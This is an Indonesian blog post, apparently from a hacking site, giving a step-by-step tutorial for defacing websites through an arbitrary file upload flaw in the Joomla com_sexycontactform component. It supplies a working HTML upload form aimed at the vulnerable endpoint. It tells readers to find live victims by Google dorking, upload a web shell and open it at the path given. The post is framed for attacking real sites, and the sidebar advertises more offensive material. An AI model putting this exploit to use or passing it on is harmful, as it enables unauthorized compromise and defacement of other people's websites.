• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Deface dengan Exploit Joomla com_sexycontactform Arbitrary File Upload Vulnerability

October 27, 2014 by Jack Wilder Leave a Comment

Oke kali ini mau berbagi exploit yang ane dapet kemaren. Sebenernya masih banyak target perawan sih, tapi berhubung ane mau berhenti dari dunia persilatan ini, wkwkwk . Ane share aja deh tutornya. Semoga bermanfaat bagi yang masih doyan deface.
Oke, pertama, siapin dulu html exploiter nya.
<form method=”POST” action=”http://localhost/components/com_sexycontactform//fileupload/index.php”
enctype=”multipart/form-data”>
<input type=”file” name=”files[]” /><button>Upload</button>
</form>

Simpan dengan format .html
Lalu dorking di google.
Dork : ??
Use ur brain, bitch !!
Victim nya di :
http://localhost/components/com_sexycontactform//fileupload/index.php

kalo udah nemu target , edit html explot nya tadi. ganti http://localhost dengan situs target.

lalu buka file html tadi dengan browser.

ada form upload. Upload shell lewat situ.

Kalo ada semacam notice gak jelas kek jembut gitu tandanya shell sukses di upload.

Shell ada di http://localhost/components/com_sexycontactform//fileupload/files/shell.php

Sekian tutor kali ini, semoga bermanfaat .
Happy Hacking ^_^

Filed Under: Uncategorized Tagged With: Exploit, Hacking

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Download 1n73ct10n / 1n73ction Privat Web Shell by X’1N73CT

Woocommerce Custom Tshirt Desginer CSRF Shell Upload Vulnerability

Uptimerobot.com Custom Domain or Subdomain Takeover

DNS Hijacking through Social Engineering

Deface WordPress dengan Exploit WordPress TheLoft Theme Arbitrary File Download Vulnerability

Readme.io Custom Domain or Subdomain Takeover

MIME Type Sniffing pada Form Upload Gambar

Tutorial Hack WHM dan cPanel dengan WHMCS Killer

Cracking FTP Password using Hydra on BackBox Linux

Deteksi Celah No Redirect pada Suatu Situs menggunakan cURL

LinuxSec / 9 queries in 0.10 seconds